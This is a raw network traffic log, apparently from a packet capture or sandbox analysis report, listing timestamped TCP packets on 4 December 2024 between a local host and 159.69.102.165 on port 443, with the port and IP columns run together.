                                                                                                                                                                      Dec 4, 2024 17:05:13.154871941 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.155107021 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155150890 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.155251980 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155272007 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.155318975 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155344963 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.155457973 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.203330040 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.386854887 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.387001038 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.387078047 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.387183905 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.387212992 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.387326956 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.435329914 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541063070 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541224957 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541266918 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541415930 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541439056 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.541594982 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541618109 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541639090 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.541714907 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.587341070 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.701913118 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.701982021 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.702600956 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.702615023 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.704931021 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.704936981 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.757184982 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.757330894 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.757361889 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.757482052 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.803332090 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.803572893 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.851327896 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893309116 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893460989 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893501043 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893584967 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893594980 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893630981 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:13.893685102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893718958 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.893779039 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:13.939332008 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.111273050 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.111438990 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.111465931 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.111623049 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.159342051 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.159502029 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.207334995 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247092962 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247271061 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.247303009 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247421980 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.247447014 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.247553110 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.247582912 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.291337967 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.388410091 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.388609886 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.388628006 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.388739109 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.388751030 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.388793945 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.388853073 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.431328058 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.575397015 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.575587988 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.575647116 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.575778008 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.575809956 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.575902939 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.575931072 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.575937986 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.575953007 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.619332075 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.727483988 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.727615118 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.727633953 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.727761984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.727835894 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.727863073 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.727987051 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.771342039 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.856843948 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.859175920 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.859216928 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.862946033 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.862982988 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.862997055 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.907341003 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.981745958 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.982146025 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:14.982436895 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.982501984 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.982544899 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:14.982583046 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.023329973 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.026983976 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.027054071 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.027108908 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.027139902 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.067327976 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.105770111 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.106012106 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.106276989 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.106340885 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.106374025 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.125835896 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.125853062 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.125922918 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.126025915 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.126059055 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.126400948 CET49816443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.126420021 CET44349816159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.151329994 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.151494026 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.154038906 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.154093027 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.154259920 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.154715061 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.154727936 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.199331045 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.228467941 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.228631973 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.228895903 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.228945017 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.271322012 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.272213936 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.319327116 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.351653099 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.351814032 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.351849079 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.351979017 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.399322033 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.469269037 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.469527006 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.469808102 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.469845057 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.469875097 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.469890118 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.511322021 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.512833118 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.512969017 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.513010979 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.555320978 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.587363005 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.587532997 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.587665081 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.587703943 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.635334015 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.635518074 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.635551929 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.683320999 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.689845085 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.689959049 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.690005064 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.690026999 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.690159082 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.731324911 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.955878973 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.956052065 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.956087112 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.956126928 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.956248999 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.958530903 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.958712101 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.958780050 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.958813906 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.958813906 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.958862066 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.959166050 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959177017 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959201097 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959219933 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959255934 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959255934 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959281921 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959294081 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959323883 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.959331989 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.975825071 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.975887060 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.975929976 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.976001978 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.976016998 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.976051092 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.976102114 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.976121902 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:15.976146936 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:15.976169109 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:16.091599941 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:16.489880085 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:17.012228966 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:17.012881041 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:17.013362885 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:17.013370991 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:17.015260935 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:17.015270948 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:17.015326977 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:17.015331984 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:18.039086103 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:18.039170027 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:18.039233923 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:18.039334059 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:18.040585995 CET49821443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:18.040606976 CET44349821159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:18.215620041 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:18.215675116 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:18.215753078 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:18.216037035 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:18.216058016 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.157551050 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.157620907 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.157634020 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.157649040 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.157682896 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.157694101 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.158627033 CET49805443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.158642054 CET44349805159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.232366085 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.232409954 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.232476950 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.232728004 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.232742071 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.631268978 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.631443024 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.632020950 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.632028103 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.634099960 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.634107113 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:19.634135962 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:19.634143114 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.634470940 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.634598017 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.635106087 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.635169983 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.635188103 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.635200024 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.635207891 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.635231018 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.637131929 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.637136936 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.637159109 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.637170076 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:20.640409946 CET49828443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:20.640427113 CET44349828159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:21.243136883 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:21.243171930 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:21.243244886 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:21.243458033 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:21.243474007 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:21.646109104 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:21.646183014 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:21.646219015 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:21.646238089 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:21.647238016 CET49832443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:21.647253990 CET44349832159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:22.249159098 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.249209881 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:22.249352932 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.249545097 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.249558926 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:22.645162106 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:22.645327091 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.645888090 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.645895004 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:22.647928953 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.647933960 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:22.647979975 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:22.647985935 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.653645039 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.653707027 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.654175043 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.654186010 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.655996084 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.656002045 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.656028986 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.656043053 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.677547932 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.677608967 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.677618980 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.677647114 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:23.677664995 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.677683115 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.678714991 CET49836443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:23.678733110 CET44349836159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:24.259162903 CET49841443192.168.2.4159.69.102.165
